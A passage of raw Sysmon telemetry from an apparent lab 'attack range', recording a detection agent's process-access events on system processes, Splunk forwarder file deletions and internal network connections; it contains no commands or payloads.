12:18:02.724{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015399Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.718{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015398Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.716{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015397Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.712{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015396Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.708{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015395Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.706{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015394Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.698{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015393Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.694{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015392Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.683{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015391Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.681{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015390Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.666{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015389Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.657{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015388Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.643{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015387Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.637{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015386Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.622{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015385Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.589{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015384Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.582{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015383Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.577{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015382Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.565{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015381Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.551{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015380Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.542{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015379Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.533{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000015378Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.531{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 23542300x800000000000000015377Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:02.490{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=914AD1F9988236D1C6788DBFF79873D8,SHA256=9349C56181FAA5AD715678C6A0631CE3A590D370231F5567DD5D1299F48D036F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015411Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:03.968{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015410Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:03.718{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD3283B7C1C3F3949CE049A7A752072B,SHA256=A3BEA6FC36094BCE39ACDF61F9D7D19DFDA31668024837E7FDDFD3E3E7BA6BC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:03.091{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9505E1F7D313399C5926A6B76E6A6BE9,SHA256=A04E9FDABC26BA7BA7C459AA680B4C1068DADEEC37360E04E25F5DCE1E90BC20,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015409Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:03.349{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-029MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015412Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:04.358{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-030MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:04.870{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8921208C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000040224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:04.177{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02252041A038F13DFF32D2E069839999,SHA256=E9877520B8684264D3314661E321A48B0A6F88A149C5F646B587965D517A8249,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015414Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:03.832{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50049-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 23542300x800000000000000015413Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:05.008{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A23C4151C842A8F0B34A9D2784D048,SHA256=640572F6BE6C8E479C51D49C11F64DD705A224831A8B5F87949FD935CF82C38A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:05.255{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65B992AA7534B9E37569A512A3C0D72D,SHA256=CEAA2044538749FADD3E5B5C58CAAD969AD09C3D5DA35C4C6464B5B85B7DB178,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015416Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:05.079{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50050-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015415Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:06.105{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=810FF3AEE5639A3F95A9C03BE62DAB53,SHA256=1F97364EAF679886046BA825DF76D22E0DC49DBF4D54ECD1C12B946852C222AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:04.665{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56239-false10.0.1.12-8000- 23542300x800000000000000040228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:06.314{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 